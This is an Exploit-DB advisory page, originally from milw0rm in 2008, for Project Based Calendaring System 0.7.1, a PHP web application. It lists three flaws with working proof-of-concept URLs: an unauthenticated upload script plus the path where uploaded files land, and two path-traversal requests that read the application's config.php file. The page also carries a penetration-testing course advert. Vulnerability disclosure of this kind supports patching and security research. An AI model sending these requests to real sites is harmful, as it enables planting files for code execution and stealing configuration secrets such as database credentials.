Project Based Calendaring System (PBCS) 0.7.1 - Multiple Vulnerabilities

EDB-ID:

5523


Author:

GoLd_M

Type:

webapps


Platform:

PHP

Date:

2008-04-30


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

Project Based Calendaring System (PBCS) Version 0.7.1 Multiple Vulnerabilities
Script: http://www.pbcs.org/pbcs_download.php
Poc : 
Hi str0ke Thanx To Posted but I Want Add Some Vulns In This Script
1- remote file upload
http://localhost/pbcs-0.7.1-1/src/yopy_upload.php
after upload you can get you file on
http://localhost/pbcs-0.7.1-1//tmp/uploads/name your file
2- remote file disclosure
http://localhost/pbcs-0.7.1-1/src/yopy_sync.php?download_file=0&filename=../config/config.php
3- file disclosure
/plugins/system-logger/print_logs.php?filename=../../config/config.php

# milw0rm.com [2008-04-30]